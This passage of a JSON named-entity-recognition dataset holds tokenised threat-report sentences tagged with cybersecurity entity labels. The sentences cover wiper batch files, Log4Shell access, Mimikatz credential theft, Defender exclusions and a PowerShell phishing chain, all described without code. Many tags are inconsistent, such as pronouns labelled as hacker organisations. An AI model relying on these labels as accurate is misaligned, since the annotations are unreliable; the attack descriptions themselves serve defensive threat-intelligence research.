"B-SecTeam", "O", "O", "O", "O" ] }, { "tokens": [ "enumerates", "system", "information", "such", "as", "hostname,", "shares,", "and", "domain", "information." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "has", "been", "known", "to", "self-propagate", "via", "SMB." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "a", "method", "of", "lateral", "movement", "and", "a", "tool", "for", "downloading/executing", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "AnyDesk", "has", "been", "the", "most", "common", "legitimate", "desktop", "software", "used", "to", "establish", "an", "interactive", "command", "and", "control", "channel,", "with", "ConnectWise", "seen", "slightly", "less", "frequently." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Operates", "as", "a", "file", "grabber" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "UPX", "packed", "sample" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "which", "unpacks" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "brute", "forcing", "post-infection", "to", "automate", "local", "and", "global", "spreading", "attempts." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "brute", "forcing" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "multiple", "levels", "of", "encoded", "commands," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "multiple", "levels", "of", "Base64", "encoding" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "use", "of", "three", "base64", "encoded", "echo", "commands" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encoded", "payload" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "downloading", "itself", "from", "malicious", "servers" ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "attacker", "began", "adding", "the", "lwp-download", "command", "as", "a", "failover", "for", "wget", "and", "curl", "to", "enable", "downloading", "commands" ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "download,", "and", "configure" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "process", "of", "downloading", "and", "setting", "persistence", "of", "some", "other", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "downloading", "a", "specific", "payload" ], "ner_tags": [ "B-Features", "O", "O", "O" ] }, { "tokens": [ "decoded", "into", "a", "new", "script" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "payload", "contains", "two", "additional", "base64", "encoded", "scripts" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "operators", "attempted", "to", "use", "cached", "credentials", "from", "local", "accounts", "to", "gain", "initial", "access", "to", "additional", "systems", "within", "an", "internal", "network." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "exploits", "known", "vulnerabilities", "in", "internet-facing", "applications" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MiniDump,", "“a", "C#", "implementation", "of", "mimikatz/pypykatz", "minidump", "functionality", "to", "get", "credentials", "from", "LSASS", "dumps”" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Usernames" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "and", "hostnames", "collected" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "It", "is", "used", "to", "connect", "to", "systems", "in", "the", "same", "network", "via", "SMB,", "to", "write", "a", "batch", "file", "to", "disk" ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "to", "push", "batch", "files", "over", "SMB", "to", "other", "systems", "within", "an", "internal", "network." ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "write", "a", "batch", "file", "to", "disk", "that", "executes", "the", "Fantasy", "wiper,", "and", "then", "run", "that", "batch", "file", "via", "PsExec", "with", "this", "command", "line", "string" ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "writing", "the", "batch", "file", "to", "disk", "and", "executing." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "batch", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "batch", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "a", "batch", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "creates", "another", "batch", "file,", "system.bat," ], "ner_tags": [ "O", "O", "O", "B-Features", "B-SamFile" ] }, { "tokens": [ "writes", "another", "batch", "file" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "batch", "file", "in", "Figure", "7,", "which", "Sandals", "creates", "on", "remote", "systems", "to", "launch" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "both", "use", "batch", "files", "that", "run", "via", "the", "Windows", "command", "shell." ], "ner_tags": [ "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ease", "of", "batch", "file", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "write", "the", "batch", "file", "on", "the", "remote", "system." ], "ner_tags": [ "O", "O", "B-Way", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "it", "writes", "a", "batch", "file" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "lists", "the", "command", "line", "arguments", "accepted" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "deletes", "all", "files", "written", "to", "disk", "in", "the", "current", "working", "directory" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "then", "deletes", "the", "file." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "deletes", "the", "directory", "with", "the", "files", "causing", "the", "errors" ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "recursively", "deletes", "all", "files" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "file", "deletion", "functions" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "File", "deletion", "functions" ], "ner_tags": [ "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "File", "deletion", "functions" ], "ner_tags": [ "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "then", "deletes", "the", "files." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "decoded", "command", "line", "parameter" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "base64", "string" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "base64-encoded", "argument" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "a", "base64", "encoded", "argument" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "It", "collects", "a", "list", "of", "fixed", "drives", "but", "excludes", "the", "drive", "where", "the", "%WINDOWS%", "directory", "exists." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Then", "it", "enters", "a", "for", "loop", "iterating", "over", "the", "drive", "list", "to", "build", "a", "recursive", "directory", "listing" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "shows", "that", "the", "directory", "listing", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Directory", "listing", "functions" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ ",", "the", "GetSubDirectoryFileListRecursive", "function" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Recursive", "directory", "listing", "functions" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "and", "then", "self-deletes." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "bat", "deletes", "itself" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "attempts", "to", "clear", "file", "system", "cache", "memory,", "and", "self-deletes" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "that", "deletes", "the", "Fantasy", "wiper", "from", "disk", "and", "then", "deletes", "itself." ], "ner_tags": [ "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creates", "a", "batch", "file", "in", "%WINDOWS%\\Temp", "called", "registry.bat." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "deletes", "the", "following", "registry", "keys:", "HKCR\\.EXE", "HKCR\\.dll", "HKCR\\*" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SecTeam" ] }, { "tokens": [ "Then", "it", "runs", "the", "following", "to", "attempt", "to", "clear", "file", "system", "cache", "memory:", "%windir%\\system32\\rundll32.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "GetSubDirectoryFileListRecursive", "function" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "uses", "the", "LookupPrivilegeValue", "and", "AdjustTokenPrivilege", "APIs" ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "operators", "attempted", "to", "capture", "cached", "credentials", "and", "then", "use", "them", "for", "lateral", "movement." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "used", "built-in", "Windows", "user", "account", "DefaultAccount." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "the", "built-in", "Windows", "user", "account", "[T1078.001]", "to", "move", "laterally" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTPS", "activity", "from", "IP", "address", "to", "the", "organization’s", "VMware", "server." ], "ner_tags": [ "B-Org", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Following", "HTTPS", "activity," ], "ner_tags": [ "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "outgoing", "HTTPS", "port", "443", "connections", "to", "and", "(the", "prior", "domain", "in", "reverse)." ], "ner_tags": [ "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encoded", "payload" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "to", "download", "next", "stage", "and", "execute", "it\"" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "downloaded", "malware", "and", "multiple", "tools", "to", "the", "network,", "including", "PsExec,", "Mimikatz,", "and", "Ngrok." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "The", "exclusion", "rule", "allowlisted", "the", "entire", ",", "enabling", "threat", "actors", "to", "download", "tools", "to", "the", "without", "virus", "scans." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "that", "added", "an", "exclusion", "rule", "to", "Windows", "Defender" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "actors", "manually", "disabled", "Windows", "Defender", "via", "the", "Graphical", "User", "Interface", "(GUI)" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "added", "an", "exclusion", "rule", "to", "Windows", "Defender." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Org" ] }, { "tokens": [ "The", "tool", "allowlisted", "the", "entire", "c:\\drive,", "enabling", "the", "actors", "to", "bypass", "virus", "scans", "for", "tools", "they", "downloaded", "to", "the", "c:\\drive." ], "ner_tags": [ "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "manually", "disabled", "Windows", "Defender", "via", "the", "GUI." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actors", "also", "moved", "laterally", "to", "the", "domain", "controller,", "compromised", "credentials," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "the", "actors", "gained", "access", "to", "a", "VMware", "service", "account", "with", "administrator", "and", "system", "level", "access" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "February", "2022,", "the", "threat", "actors", "exploited", "Log4Shell", "[T1190]", "for", "initial", "access" ], "ner_tags": [ "O", "I-Time", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "exploited", "Log4Shell", "for", "initial", "access", "to", "the", "organization’s", "VMware", "Horizon", "server." ], "ner_tags": [ "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "exploit", "payload", "created", "a", "Scheduled", "Task" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Scheduled", "Task", "was", "named", "to", "masquerade", "as", "a", "legitimate", "Windows", "task." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors’", "exploit", "payload", "created", "Scheduled", "Task", "RuntimeBrokerService.exe,", "which", "executed", "RuntimeBroker.exe", "daily", "as", "SYSTEM." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-SamFile", "O", "O", "B-Way" ] }, { "tokens": [ "the", "actors", "used", "RDP" ], "ner_tags": [ "O", "O", "O", "B-Way" ] }, { "tokens": [ "the", "actors", "leveraged", "RDP", "to", "propagate", "to", "several", "hosts", "within", "the", "network." ], "ner_tags": [ "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "were", "able", "to", "proxy", "[T1090]", "RDP", "sessions," ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "The", "actors", "used", "RDP", "to", "move", "laterally", "to", "multiple", "hosts", "on", "the", "network." ], "ner_tags": [ "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "Ngrok", "to", "proxy", "RDP", "connections", "and", "to", "perform", "command", "and", "control." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "reverse", "proxy", "tool", "for", "proxying", "an", "internal", "service" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz", "–", "a", "credential", "theft", "tool." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actors", "then", "executed", "Mimikatz", "on", "VDI-KMS", "to", "harvest", "credentials" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Additionally,", "the", "threat", "actor", "was", "observed", "attempting", "to", "dump", "the", "Local", "Security", "Authority", "Subsystem", "Service", "(LSASS)", "process" ], "ner_tags": [ "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "used", "Mimikatz" ], "ner_tags": [ "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "actors", "were", "observed", "trying", "to", "dump", "LSASS", "process." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "used", "Mimikatz", "to", "harvest", "credentials." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "were", "able", "to", "proxy" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "used", "Ngrok", "to", "proxy" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "The", "actors", "removed", "malicious", "file", "mde.ps1", "from", "the", "dis." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "When", "executed,", "mde.ps1", "downloaded", "from", "and", "removed", "from", "the", "disk" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "send", "phishing", "emails", "with", "malicious", "HTML", "attachments", "to", "all", "addresses", "in", "the", "victim’s", "mailbox." ], "ner_tags": [ "O", "B-Way", "I-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sending", "additional", "phishing", "emails", "to", "the", "victim’s", "contacts" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "phishing", "email" ], "ner_tags": [ "B-Way", "I-Way" ] }, { "tokens": [ "starts", "with", "an", "income", "tax-themed", "phishing", "email", "written", "in", "Spanish,", "disguising", "itself", "as", "a", "tax", "receipt", "notification" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "B-Area", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "disseminate", "additional", "phishing", "emails", "to", "the", "victim’s", "contacts." ], "ner_tags": [ "O", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "send", "phishing", "emails", "with", "malicious", "HTML", "attachments", "to", "all", "addresses", "in", "the", "victim’s", "mailbox." ], "ner_tags": [ "O", "B-Way", "I-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "constructs", "an", "email", "with", "a", "hardcoded", "subject", "and", "body", "and", "attaches", "the", "HTML", "file", "from", "the", "“fb”", "folder." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "collect", "the", "victim’s", "login", "credentials", "for", "various", "online", "accounts" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "login", "credentials" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "targets", "victim’s", "login", "credentials" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "credentials" ], "ner_tags": [ "O" ] }, { "tokens": [ "attempt", "to", "compromise", "the", "victim’s", "login", "credentials", "for", "webmail", "services" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "keystrokes" ], "ner_tags": [ "O" ] }, { "tokens": [ "keylogging," ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "logs", "keystrokes" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "logging", "keystrokes", "via", "polling", "and", "application", "hooks" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "logging", "keystrokes" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "operating", "system", "information" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "system", "information," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "performs", "surveillance", "on", "the", "victim’s", "machine", "by", "collecting", "system", "information", "such", "as", "hostnames,", "IPv4", "address,", "operating", "system", "version,", "disk", "volume", "information,", "disk", "size", "and", "anti-virus", "software", "information,", "and", "gets", "the", "system’s", "default", "language." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "multiple", "hosts,", "including", "an", "Amazon", "Web", "Services", "(AWS)", "Elastic", "Compute", "Cloud", "(EC2)", "instance,", "accessed", "through", "its", "public", "URL,", "to", "host", "the", "malicious", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "requests", "a", "data", "stream", "from", "the", "C2", "server", "through", "the", "URL" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "hosted", "the", "PowerShell", "downloader", "script" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "hosted", "the", "ZIP", "file", "containing", "the", "payloads" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "downloads", "a", "RAR", "file." ], "ner_tags": [ "O", "O", "B-Tool", "O" ] }, { "tokens": [ "downloads", "the", "PowerShell", "downloader", "script", "from", "an", "attacker-controlled", "server" ], "ner_tags": [ "B-Features", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "download", "a", "ZIP", "file" ], "ner_tags": [ "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "downloading" ], "ner_tags": [ "O" ] }, { "tokens": [ "download", "the", "payloads" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "downloads", "a", "malicious", "ZIP", "file" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "drops", "the", "DLL" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "download", "the", "PowerShell", "downloader", "script", "from", "the", "attacker-controlled", "server" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "download", "and", "run", "the", "Horabot", "“au”", "using", "the", "URL" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "downloading", "files", "from", "a", "URL" ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "downloads", "the", "contents", "of", "an", "HTML", "file", "stored", "in", "an", "attacker-controlled", "server" ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "virtual", "private", "server", "(VPS)", "behind", "which", "the", "attacker", "has", "parked", "the", "actual", "command", "and", "control", "(C2)", "server" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "domain", "name", "also", "resembled", "the", "legitimate", "Mexican", "Tax", "Agency", "domain,", "a", "tactic", "the", "attacker", "likely", "adopted", "to", "disguise", "malicious", "traffic." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "is", "a", "legitimate", "AutoIt", "interpreter." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "PowerShell", "downloader" ], "ner_tags": [ "O", "B-Way", "B-Tool" ] }, { "tokens": [ "leads", "to", "payload", "delivery", "through", "the", "execution", "of", "a", "PowerShell", "downloader", "script" ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "RAR", "file", "contains", "a", "batch", "file", "with", "a", "CMD", "extension" ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executes", "it", "through", "the", "PowerShell", "commands." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "downloading", "and", "executing", "two", "other", "PowerShell", "scripts", "from", "a", "different", "attacker-controlled", "server." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "PowerShell", "downloader", "script,", "which", "the", "attacker", "attempts", "to", "execute", "to", "re-infect", "the", "victim’s", "machine," ], "ner_tags": [ "B-Way", "I-Tool", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "batch", "file", "downloads", "the", "PowerShell", "downloaderThe" ], "ner_tags": [ "O", "O", "I-Features", "I-Features", "B-Way", "O" ] }, { "tokens": [ "a", "malicious", "batch", "file", "with", "a", ".cmd", "extension", "is", "downloaded", "to", "the", "user’s", "machine." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "executes", "an", "embedded", "PowerShell", "command", "to", "download", "the", "next-stage", "PowerShell", "script", "from", "the", "server", "and", "execute", "it", "on", "the", "victim’s", "machine." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creates", "two", "other", "malicious", "batch", "scripts", "with", "the", "extension", ".cmd", "in", "the", "folder", "“/Users/Public.”" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "executes", "one", "of", "the", "dropped", "batch", "files" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "executes", "an", "embedded", "PowerShell", "command" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "executes", "another", "dropped", "batch", "file," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "executes", "a", "PowerShell", "command" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "contains", "the", "payload", "DLLs", "and", "a", "few", "legitimate", "executables", "and", "DLLs" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DLL", "sideloadingThis" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "sideloading", "to", "legitimate", "executables" ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "run", "the", "payloads", "by", "sideloading", "them", "to", "the", "legitimate", "executables" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sideload", "a", "malicious", "DLL" ], "ner_tags": [ "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "sideload", "the", "DLL" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "sideloads", "the", "DLL", "to", "the", "AutoIt", "interpreter", "process" ], "ner_tags": [ "B-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "enticing", "users", "to", "open", "the", "attached", "malicious", "HTML", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "lures", "them", "to", "click", "an", "embedded", "malicious", "hyperlink", "which" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executed", "when", "the", "victim", "opens", "the", "contents", "of", "the", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "user", "opens", "the", "CMD", "file," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "an", "embedded", "URL", "is", "launched", "in", "the", "victim’s", "browser," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "has", "an", "embedded", "malicious", "URL" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "redirecting", "to", "another", "malicious", "HTML", "file", "from", "an", "attacker-controlled", "AWS", "EC2", "instance." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "configured", "to", "run", "the", "payloads", "in", "the", "startup", "folder", "of", "the", "victim’s", "machine" ], "ner_tags": [ "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creates", "two", "Windows", "shortcut", "files", "in", "the", "Windows", "startup", "folder", "using", 